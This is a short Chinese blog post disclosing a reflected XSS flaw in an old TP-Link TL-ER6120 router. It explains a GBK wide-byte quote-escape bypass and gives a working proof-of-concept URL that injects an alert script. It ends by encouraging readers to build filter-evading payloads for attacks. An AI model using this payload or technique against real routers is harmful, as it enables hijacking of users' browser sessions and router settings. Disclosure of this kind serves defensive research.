标签归档:路由器XSS

TP-Link路由器 反射xss一枚

这个是针对老版的tp-link,
当前软件版本: 1.2.1 Build 20130604 Rel.31975
当前硬件版本: TL-ER6120 v1.0
我觉得要换路由器了 – – 这路由器太老了
对于那种需要401认证输入密码的 就不行
进个网站,路由器限制了

<script language=JavaScript>
var OptValue = new Array(
"www.baidu.com",
"",
0,
0,0 );
</script>

由图片可以看出字符编码为GBK,你懂的,宽字节绕过
地址栏输入 %81%22 即可闭合双引号。接下来你懂的
测试浏览器 firefox

http://192.168.0.1/userRpm/AdCastWebsiteNotice.htm?orgUrl=%81%22%29;%3C/script%3E%3Cscript%3Ealert%28%27Leesec%27%29;%3C/script%3E

IE 和 GOOGLE浏览器有XSS Filter,大家可以自己构造XSS代码,绕过XSS Filter,进行攻击